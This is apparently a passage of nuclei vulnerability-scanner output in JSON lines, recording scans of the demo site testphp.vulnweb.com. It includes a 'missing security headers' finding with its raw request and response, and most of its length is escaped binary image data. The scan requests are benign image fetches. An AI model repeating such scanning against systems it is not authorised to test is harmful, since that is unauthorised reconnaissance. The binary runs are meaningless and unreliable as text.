ufffd\\u0006\\ufffdL\\ufffdw\\ufffd\\u0007\\ufffde0\\ufffd\\ufffdVy\\u0002`g\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffdV\\ufffd\\ufffd,\\ufffd\\ufffd7\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0015=tx\\ufffd\\ufffdiV\\ufffdRM\\u003e\\ufffd$Aj\\ufffd\\ufffdG\\ufffdI!\\ufffd\\u0010U\\ufffd…\\u0003\\u0019\\ufffd$\\u001e\\ufffd\\ufffd\\ufffd*\\ufffdmF{۝\\ufffd;I+vO%\\ufffd\\ufffd\\ufffd4\\ufffd\\ufffd6y\\ufffd\\u0008\\u003c\\u000f\\ufffd\\ufffd\\ufffd\\ufffdԯ\\ufffd!\\ufffdb\\ufffd$\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdU\\ufffdKo\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\u0016f\\\\*㑜\\u0001\\ufffd\\ufffd\\ufffdI\\ufffd4\\ufffd\\ufffdi\\ufffd\\ufffdIyܤQ\\ufffd\\ufffdҾ\\ufffd\\ufffdX`\\u0005’A\\ufffd'\\u0004`.y\\ufffd\\ufffd/\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffd6\\ufffd\\ufffd\\u001f\\ufffdg\\u0008\\ufffd\\ufffd4i-\\ufffdz:\\ufffd\\u0011gP\\ufffd\\ufffdQ\\ufffd0\\ufffd\\u0011\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffddG[\\ufffd\\u001c\\ufffd\\u001fO8a\\ufffd\\u0006F\\u0008\\ufffd{\\ufffd\\ufffdt}D\\ufffd\\ufffd\\ufffd5\\u0008\\ufffd\\ufffd0!\\ufffd\\ufffd\\u0012\\ufffd\\u000c9\\u001d\\ufffd\\ufffd\\ufffd2s\\ufffd5\\ufffdu\\r\\u003e\\ufffdloo\\ufffd\\ufffd]\\u001cY\\ufffd\\ufffd\\ufffd+.v\\ufffd\\u003e\\ufffd\\ufffd(@\\ufffd\\u0001 \\u0013\\ufffdL'\\ufffdt\\ufffd\\ufffd9Y\\ufffd\\ufffdTs\\ufffd\\ufffd5\\ufffd5l\\ufffd\\u000b\\ufffd\\\"m\\ufffd\\u001c\\ufffd\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffdL\\u000c\\ufffd\\ufffd5\\ufffdo48\\ufffdNE;U%\\ufffd\\ufffd,\\ufffd\\ufffdm\\u0007h\\ufffd'\\ufffd@\\ufffdy\\u0002\\ufffd}R \\ufffd\\ufffd-\\ufffd\\ufffd\\ufffd\\u0000\\n\\ufffdpO\\u001f\\ufffd5\\ufffdU\\ufffd\\ufffdh\\ufffd\\ufffd\\u0015\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffdN\\u003e\\ufffd\\ufffd㑭g\\u001704\\ufffd!V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001fW\\ufffdO\\ufffd\\u0007\\ufffd\\ufffd\\u000bk\\t\\u0007\\ufffd\\ufffd\\ufffd%[Y\\ufffdC\\u0012\\ufffd\\ufffdA]Č\\u0010A\\ufffdG\\ufffd]\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\u001eL\\ufffd\\ufffdY\\ufffd9\\ufffdcX\\ufffd\\ufffdI!\\ufffd\\ufffdVF#*\\u0003.\\u00187\\u001fP\\u003c\\ufffd\\u0000\\t\\ufffd\\u003c\\ufffdՑ\\ufffdI}$\\ufffd\\\"\\ufffd\\ufffdv\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u003e\\ufffdx\\ufffdd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\u001f\\ufffd\\ufffdM\\ufffdu\\ufffd}+\\ufffd\\u0008 \\u001f\\ufffd\\u0003\\u0000\\ufffd\\ufffd\\ufffd\\u0019M\\ufffd'\\ufffd\\ufffdY#\\ufffdf%[\\ufffd[\\ufffd\\u003ej\\ufffd\\ufffd6\\ufffd\\u0007,4\\ufffdy\\u001elVh\\ufffdY-\\ufffd\\ufffdH\\ufffd\\ufffd\\u0019\\ufffd\\ufffdd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\u0003A4~夤{\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd^\\ufffdۊ\\ufffdY\\u0011\\u001c\\ufffd\\ufffd\\u0005\\u0015\\ufffd\\ufffd\\u0014\\n\\ufffd\\ufffdp\\u0013S\\ufffdE\\u0015D\\u0003\\ufffdbO\\u003c\\ufffd\\ufffd\\u001b\\ufffd0e8 \\ufffdV1R*ѐ\\u0006\\ufffd\\ufffd\\ufffd.\\ufffdm\\u0004\\ufffdOs \\ufffd\\ufffd\\ufffds\\ufffd6H]\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd3U\\u000b1' \\ufffdx⽣\\u001c\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd?W\\ufffdg\\ufffd2\\ufffd\\\"F\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd'\\ufffd\\ufffdO4v\\ufffdi\\ufffd1\\u0012_N\\ufffd\\ufffd=\\ufffd\\u0006\\ufffd\\ufffd\\u0004p\\u003e9?\\u001d\\ufffd+\\ufffd\\ufffd\\ufffdMoq\\u001c\\ufffd\\u0001d`ps\\ufffd\\ufffdW\\u0010\\ufffd\\ufffd\\ufffd\\ufffdsp=ûs\\ufffdO?\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdDlk+op\\ufffdt\\ufffd\\ufffdEw\\ufffdZ_\\ufffd\\ufffdݐ\\ufffd`VN\\u001c\\ufffd[ \\u000c\\ufffd\\u0015\\ufffdx\\ufffd\\ufffdrMd\\ufffdZD~\\ufffd\\ufffd3%\\ufffdO\\ufffd4\\ufffd7\\u003e\\ufffd3\\ufffd\\u0007\\ufffddc\\u0019$p\\u003cҶ\\ufffd\\ufffd\\ufffd\\ufffdxgc\\ufffd\\ufffdxQ\\ufffd\\u0001\\ufffd4Ţ\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp#Q\\ufffd?[s\\ufffd\\u001cu\\ufffd\\ufffdk\\ufffdzkj\\ufffd:^%\\ufffdv\\u0019I7\\ufffd\\ufffdU\\ufffd\\\"\\ufffd{\\ufffdɍF\\ufffd\\ufffdBeKd}\\u0001\\ufffdF@a\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffdۙIPpA\\ufffd\\ufffdNWZ\\ufffd\\u0017\\ufffd\\ufffd\\u0015U}\\ufffdm\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffdH\\r\\ufffdĆ\\u0004s\\ufffd?\\ufffd\\ufffdWv*\\u0016K\\ufffdܬ,#۵]\\ufffd\\ufffd\\ufffd9;A\\u0003\\ufffd9\\u0000.y'\\ufffdZuҩF\\u001a\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffdx34\\ufffd(\\ufffd\\ufffd\\ufffdC\\u0004;\\ufffd\\u0008\\ufffd`%m\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd#?I\\u000c\\u0000\\ufffdx\\u00002\\ufffd\\ufffd\\u0002=\\ufffd\\u0018\\ufffd\\u0005?$\\u001c\\ufffd\\ufffd\\ufffdx,e\\ufffdBM\\u0019u_i\\ufffd\\u001fKl\\ufffd\\u003e\\u0006_\\ufffd\\ufffd \\u000f\\ufffd\\ufffd]\\u0026\\ufffd\\ufffd\\ufffd\\ufffdH\\ufffdSsl\\ufffdtI\\u00260\\ufffd7\\u0001\\ufffd\\ufffd\\ufffd:\\u001eǒ9\\u0015\\u001d.\\ufffd\\ufffd3\\ufffdM\\ufffd\\ufffd\\ufffdC(\\ufffd\\ufffd\\ufffdLѣ}\\u003ev\\ufffd\\ufffd*\\ufffd1\\ufffd\\ufffd\\u003e\\ufffd\\u0007\\u0018$\\ufffd0r\\t\\ufffd~\\ufffdi\\u001d\\ufffd\\ufffdΰF\\ufffd2\\ufffd\\ufffd񗍷3`+\\u0012\\ufffd\\u0018\\ufffd\\ufffd\\u0001\\ufffdH\\ufffdHQ\\ufffd\\ufffdʉmqs\\ufffd\\ufffdgEf\\ufffd-\\ufffd\\ufffd\\u0007gh*3\\ufffd2\\ufffd\\u001b\\u0003\\ufffd\\ufffdq\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd2-\\ufffd˔\\\"Ux\\ufffd,Y\\ufffd\\u0000\\ufffdv\\n\\ufffd\\ufffd\\u001c\\u000e2AbR\\ufffd\\ufffd6\\ufffdJ\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffd\\ufffd[\\ufffd7\\ufffd\\u0014Q]\\ufffd\\u000f\\u0014T\\ufffd*\\ufffd\\u000c(\\ufffd\\ufffdt\\u0002EM@\\ufffd\\u0015D\\u0002jS\\ufffd\\ufffdEd\\ufffdI\\ufffd\\ufffd\\ufffd32\\ufffd\\ufffd\\ufffdb=\\u001a\\ufffd\\u001a\\u001cV\\ufffd)\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\t?\\ufffdo۱\\u0015\\u001a5\\ufffd\\ufffd\\ufffdXZU\\ufffdp$3\\u001e8\\u001f\\ufffd\\\\\\ufffd\\u0002x\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd12\\ufffd\\ufffd\\u0003r\\ufffd?\\ufffd\\ufffdԳ\\ufffd\\ufffd8=ؼ\\ufffdՔ\\ufffde9\\u0004v*\\ufffd\\ufffd\\ufffd,\\u0011f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8l6d!rz\\u0019$*\\ufffd\\ufffd\\u0001\\ufffd+oC\\ufffd\\ufffd\\ufffd޳J\\ufffdy\\u0002'\\ufffd\\ufffd(9w\\ufffd\\ufffd\\u0007\\ufffd\\u001f\\ufffd\\ufffd\\u0004\\ufffd[S\\ufffd\\u0016{d\\ufffd\\ufffd\\ufffdtL^!\\ufffd\\u0014ۺ \\ufffd;X\\ufffdCt\\ufffd#\\u001e;\\ufffd'\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\ufffduHu\\u001cn\\ufffd\\ufffd4n\\ufffdb\\u000b\\u0013\\ufffd9\\ufffd!o(H\\ufffdV$\\ufffdg\\ufffd!\\ufffd0\\u0007q\\u0019\\ufffd\\ufffd}D\\ufffd:\\ufffd\\ufffd\\u0008w\\ufffdVT`Tgk\\u00021\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdrj\\ufffd\\ufffdk\\ufffd'\\ufffd\\ufffdK\\u0016f\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd[J\\ufffdv\\ufffd\\u001bk\\ufffd\\ufffd \\ufffd,b\\u0011Š\\ufffd\\u0026a\\ufffd\\ufffd\\ufffd\\ufffdX\\u0012\\ufffd2\\ufffdI\\ufffd\\ufffd\\u0002\\ufffd\\ufffdT|\\u003e\\ufffd\\ufffdi4\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd;eܜu\\ufffd\\ufffd\\ufffd\\u0000|\\ufffdE\\ufffd\\ufffdܶ\\u0000$\\ufffdv\\ufffd\\u0001$\\ufffdN\\u0007\\u0003\\ufffdO\\ufffd\\ufffd}Ci\\u001a\\u0004\\ufffd\\ufffd9\\ufffdl2ZE*I?lq\\ufffd羱Ks[\\ufffd\\u0014\\ufffdӴvq\\ufffd\\ufffdz\\ufffd\\ufffdȩǂMcc\\ufffdQE\\u0015ć\\n\\ufffd(\\ufffd\\ufffdI4\\n(\\ufffd@\\u0026\\ufffdE\\u0015X\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdЬo4幞6i\\\"i\\u001c\\ufffd\\\\H\\u0001L+\\u000f\\ufffdOX\\u003c\\ufffd\\ufffd\\n+Zڎ\\ufffdB\\ufffdȾ\\ufffda@\\u0019\\ufffdx\\ufffd\\u001d\\n\\u0008澉%@\\ufffd͂\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd\\u000e\\ufffdV\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0011\\ufffd\\ufffd!=\\ufffd\\u000c\\u001e?\\ufffd\\ufffd\\ufffd\\ufffdwcmh\\ufffd\\ufffd\\ufffd\\r\\ufffd6|1\\u003c}L\\u0015G\\ufffd@\\n\\u0007\\ufffd\\u0014Q^}\\ufffd~fs\\ufffd\\ufffd!\\ufffd\\u0005\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdيX\\ufffd\\ufffd\\ufffd\\ufffdWyB\\ufffd\\u003c\\ufffd\\ufffd=\\u001c\\ufffd\\u0019\\ufffd\\ufffdj\\ufffdԒ46dE\\ufffdW\\ufffd#*\\ufffd\\u0002D\\ufffds\\ufffd\\ufffd~\\ufffd\\u001c\\ufffdsE\\u0015\\ufffd\\ufffdb\\ufffd\\ufffd7-\\ufffdI\\ufffd\\\"\\ufffd\\u00126\\ufffd\\ufffdA\\u0006\\ufffd4]\\ufffd\\ufffd]\\u001b\\ufffd\\ufffd5\\ufffd\\u0008cx\\ufffd\\ufffd1\\ufffdъ\\ufffd\\u001c\\ufffdt\\ufffd\\ufffdA\\ufffdS\\ufffd\\ufffd\\ufffdEz\\u003e3\\ufffd\\u000b\\ufffd%|\\ufffd\\ufffd\\ufffdMSF\\ufffd\\ufffd\\ufffd\\n\\ufffdI\\ufffdrG\\ufffd\\ufffd1\\ufffdI\\ufffd:żp\\ufffd\\ufffdl\\u0017r\\ufffd\\u0017\\u0001\\ufffd\\ufffd\\u0002\\ufffd\\u0015\\ufffd\\u001fO\\u0003\\ufffd\\ufffd\\u0001\\ufffd\\u0002\\ufffd(\\ufffdj\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:19.384060665Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"path\":\"/pictures/5.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"request\":\"GET /pictures/5.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4428\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:12 GMT\\r\\nEtag: \\\"4dca64a1-114c\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0002\\u0003\\u0005\\u0001\\u0007\\u0006\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0004\\u0006\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0012!1AQ\\u0013\\\"\\u00052aq\\u0006\\u0014#B\\ufffd\\ufffd\\ufffd\\ufffdR\\ufffd\\u0015b\\ufffdr\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0000\\u0001\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000/\\u0011\\u0000\\u0001\\u0003\\u0002\\u0005\\u0001\\u0007\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0000\\u0002\\u0003\\u0004\\u0011\\u0005\\u0012!1A\\u0013Qaq\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0006\\ufffd\\u00142\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u001a\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd0\\ufffdV\\u0015\\ufffd\\ufffdgQ\\ufffd%XmƲ \\ufffd\\ufffdTg6\\ufffdru\\ufffdƲ0\\ufffd\\ufffdG\\n\\u003e2y\\ufffd\\ufffdd\\ufffdEV\\u0019m}3\\ufffd1\\ufffd\\ufffd\\u003c*\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdqY\\u0016`\\ufffd\\ufffdd\\ufffd\\ufffd6\\ufffdk\\\"\\ufffdw\\ufffd\\ufffdr\\ufffd{0\\ufffdqY.\\ufffd\\ufffd\\u0019*\\u003e3\\ufffd\\ufffdF\\u001e\\u0013u\\ufffd\\u000c\\ufffd\\u000f\\u0018\\ufffdDu2i\\ufffd\\ufffdh.\\ufffdH\\ufffd2\\ufffd\\ufffd\\t\\u0019^Ӗ\\ufffd.z*\\ufffdJ\\ufffd\\ufffd\\u001d\\u0014\\u0002\\ufffd@2ء\\u0012\\t\\u0018=\\ufffd+\\u0012T\\u00176.\\ufffd-\\ufffd\\ufffdEcZA\\u0012,\\ufffd*\\ufffd!\\t\\u0003o\\u0007\\ufffd:\\ufffd\\u003c\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd\\ufffdFh\\ufffdu\\ufffd'\\u000b\\u00086\\u0001\\u0026\\ufffd\\u0003\\ufffd\\ufffd\\u000c4\\r\\ufffd|\\ufffdӼ\\ufffd@\\u0005\\ufffd\\ufffd\\u003e[$LL\\r2Ѡ\\ufffd\\ufffd\\ufffd\\u0000\\u0019ƈ\\ufffd\\ufffd\\ufffdӅ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0007\\ufffd=N\\ufffd\\ufffd2\\u003ct\\ufffdR\\ufffd*Xr\\ufffdr\\ufffd\\u001d8?+\\u000b\\ufffd#2H\\ufffd\\ufffd1\\ufffd\\u0012D\\ufffdሠ\\u0006\\ufffd6\\ufffd9\\u0006\\ufffdo\\ufffd}\\ufffd\\u0001`ֻV\\ufffdV\\u000c\\ufffd\\ufffd\\ufffd./c\\ufffdY\\ufffdp\\ufffd\\ufffd4\\ufffdz\\u000fH\\ufffd\\u0011V\\n\\ufffd\\ufffd\\u001b\\ufffd\\ufffdu\\ufffd\\u0012)X\\u0005\\ufffdn\\ufffd\\ufffd:\\ufffd\\ufffdaU\\u0004\\ufffd\\ufffd\\r?\\ufffd?\\ufffd\\u0008\\ufffd\\rm^\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\r}\\ufffd\\ufffd\\nF\\ufffd\\u0019\\ufffd\\ufffdI\\u0004J\\ufffd\\u0015:\\ufffd\\u0003\\ufffdd\\ufffd?\\ufffd\\ufffdSϬ\\ufffd\\ufffd$!\\ufffdj\\u0004\\ufffd6\\ufffd_\\ufffd_\\u001fk\\ufffd\\r\\u0000\\\\\\ufffd\\ufffdUM4\\ufffd(\\u0008\\u0016\\u0017$\\ufffd\\ufffd\\ufffd\\ufffdt\\ufffd\\ufffd\\ufffdx$\\u000e\\u0019\\u0003q\\ufffd#ʚ\\ufffd\\u003e\\ufffd+\\u001a9\\ufffd3\\ufffd;V\\ufffd\\ufffd8\\ufffd\\ufffdc\\ufffd\\ufffdLz\\u0007Ӽ\\ufffd6\\ufffd53\\ufffd\\u0012\\ufffdeZ8\\t4\\u0018\\ufffd\\ufffd\\ufffdJ\\ufffd\\u001c\\u000e\\ufffd\\ufffd4\\ufffd@\\ufffd\\ufffdM\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\u0005EF\\ufffdr9*H\\ufffd(qV\\u000b\\ufffd\\ufffd\\ufffd,\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdm\\ufffd\\ufffd%\\ufffd \\ufffd\\u0006\\ufffdB\\ufffdp\\ufffd\\u0004\\ufffd1b\\u0010\\ufffd\\ufffdj9$\\ufffd}?\\ufffd\\ufffd\\ufffd,[M\\ufffd\\ufffd\\ufffd\\u0001\\u001b\\ufffdkQ\\u001dױ\\ufffd`\\ufffd+l\\ufffdiqf\\ufffd\\ufffd\\ufffd\\ufffdWw\\ufffd%+\\u0018\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffd$\\ufffdp/8󿡣\\ufffd@\\ufffd\\ufffd\\ufffdr\\ufffdE\\ufffdk\\u001d\\ufffd6\\u003c\\ufffd\\u0008\\ufffd\\ufffdc\\u0006\\ufffdIYX\\ufffd\\ufffd\\ufffd/\\ufffdq\\ufffd\\ufffdR:\\u0018\\ufffd5\\n^%e\\u001eǐ\\ufffd\\u0007\\ufffd\\ufffdU}\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffdR\\ufffd\\ufffd)\\u0000\\u0012H\\ufffd\\ufffd\\u0000\\r\\ufffd\\ufffd\\ufffd\\u003c\\ufffd9\\ufffd\\u0026\\ufffdW\\ufffdI6\\ufffd?a?9\\ufffd\\ufffd\\ufffd!\\ufffduR\\ufffd\\u0000\\ufffd51\\u003e\\ufffd\\u000e\\ufffd\\ufffd\\u001e\\u001dDl-8;ā\\ufffd\\ufffd\\ufffd\\ufffd\\u00006\\u000f?B\\u0000\\u001b\\\\n\\ufffdjꧠ\\ufffd\\ufffdq~c\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd\\ufffd$SH\\ufffd\\u00132L\\ufffd@\\ufffdW\\ufffd*ё\\ufffdf\\ufffdz\\ufffd\\ufffd\\u0000+\\ufffd\\ufffdm9\\ufffd\\ufffd\\ufffd\\u0014\\ufffdb*\\ufffd\\ufffdV\\ufffdZ4o\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\u001a\\ufffdٷJʭ\\ufffdH\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000ex\\ufffd\\ufffd\\u001b\\ufffd(\\ufffd\\ufffd%\\ufffd;+\\ufffd\\ufffdU0\\ufffd\\ufffdXKo\\ufffd\\ufffd\\ufffdhi\\ufffd\\r4~\\ufffd\\ufffd~`\\ufffd\\ufffd(b»\\ufffdz׎\\ufffd\\ufffd\\ufffd\\ufffdh@`\\ufffd\\ufffd\\ufffd6\\ufffdeGݶ\\ufffd\\u0000\\ufffdV\\u0008\\ufffd\\u0005\\ufffdʦ\\ufffd\\ufffd\\ufffd6\\ufffd\\ufffd\\ufffd\\r\\ufffd;\\ufffd\\u001d\\t\\ufffd\\u0000@\\ufffd\\ufffds\\ufffdC\\u0014r\\ufffdR3\\u001f\\ufffd\\ufffd2\\t\\u0014i\\ufffd\\ufffd\\ufffdTG\\ufffd:\\u0010\\u0008\\ufffd\\ufffd\\ufffdB\\ufffd'\\ufffd(\\\\e\\ufffdp\\ufffd |\\ufffdR\\ufffd.\\ufffd\\u000b\\ufffd\\ufffd\\ufffdt\\u0005\\ufffd\\ufffd\\u0002C\\ufffd\\ufffd7\\u0016\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\ufffd8\\ufffd\\u0007M\\ufffdE$,\\ufffd\\u0026\\u0014\\u000e\\ufffd\\u003c\\ufffd\\u0007\\ufffd\\ufffd\\u001d\\t\\ufffd4\\ufffdJҼ\\ufffd~\\ufffd\\ufffd9jC,d\\ufffdف\\u001c\\u0001\\ufffd;\\ufffd\\u0000]\\ufffd\\u0007kZ߇\\ufffd\\ufffdP\\ufffd\\ufffd\\u0015\\ufffd2\\ufffd(k\\ufffd\\ufffd/\\ufffd\\u0011\\ufffdM\\ufffd\\ufffd\\ufffd:\\ufffdd\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd林ԝ\\ufffdCpX\\ufffd\\ufffd8\\ufffd/\\ufffd\\u0016\\u003c\\ufffd\\u001c\\ufffd8\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdkkb\\ufffdu\\u0011G/\\ufffd^O\\ufffdT\\u0014x\\ufffd}Gׯ\\ufffdŠ\\ufffdsJ\\u0015\\ufffde\\n\\ufffdw\\ufffdZW\\u0000\\ufffd\\r\\u001e/\\ufffdW{]{\\u0005\\ufffd\\ufffdUQ22]a}{\\ufffd\\u003e]OK\\ufffd\\ufffdF\\ufffd*D\\u0026\\ufffd7;\\ufffd\\ufffd{\\ufffd\\ufffdQ\\u0010\\ufffd\\ufffd\\ufffdC\\ufffdP\\ufffdG\\ufffd\\ufffd\\ufffd\\ufffdv(\\u0001\\ufffd\\ufffdO8\\ufffdZWi\\ufffd\\ufffd\\u0001i#4֥A\\ufffdш\\ufffd\\ufffdsW]\\ufffd\\ufffd\\u0013$\\ufffd4N\\u001fiV\\ufffdn\\ufffd\\u0006\\u001c\\ufffd\\ufffd\\u0010~\\ufffd\\ufffd9#\\u0001:\\u0015F\\ufffdH\\u0003\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdA%\\ufffd\\ufffdx\\ufffd\\ufffd\\u000fw5\\ufffd\\ufffd\\ufffd\\u0003*\\ufffd\\u0003\\u0016\\ufffdIY\\ufffdHY\\u001byqE@\\ufffd\\ufffd5\\ufffd\\ufffdo\\ufffd۾\\ufffd\\ufffd\\u0012(U_dP\\ufffdV4-)$\\ufffdJ,\\ufffdl\\ufffd\\\"\\ufffd\\ufffdךˌ\\r,pƞ\\ufffds\\ufffd\\ufffd\\ufffd\\u00197B\\ufffd\\ufffd-\\ufffdC\\ufffdm\\ufffd\\ufffd\\u000f\\u0016\\r\\ufffd\\ufffdB\\ufffdf\\ufffd\\u001b\\u0014\\ufffd\\ufffd\\ufffd\\ufffd\\u001fE\\ufffdڄ\\ufffd\\ufffd\\ufffd\\ufffd18\\ufffd\\ufffd\\u001d\\ufffd\\ufffdUoU\\ufffd\\ufffd\\\"\\ufffdоؤӳ0\\u0006\\ufffdp3cT\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd5\\r$6x\\ufffd\\u0010z\\ufffd\\u0026ʶ\\ufffdTh\\u001a#\\ufffdV-\\u0002j\\u0002\\u0015\\u0005\\t\\ufffd\\ufffd\\t\\u0014M_#\\ufffd\\u001b\\u0000\\ufffd\\u0005\\u001e/+\\ufffdóJ\\ufffd\\ufffd\\ufffdF\\ufffd\\ufffd\\ufffd%\\ufffdK\\ufffd\\ufffdR\\ufffdF\\ufffd*\\ufffd2\\ufffd\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffdhi\\ufffd%d\\ufffd4\\ufffdEz\\ufffd\\u0015BG\\ufffd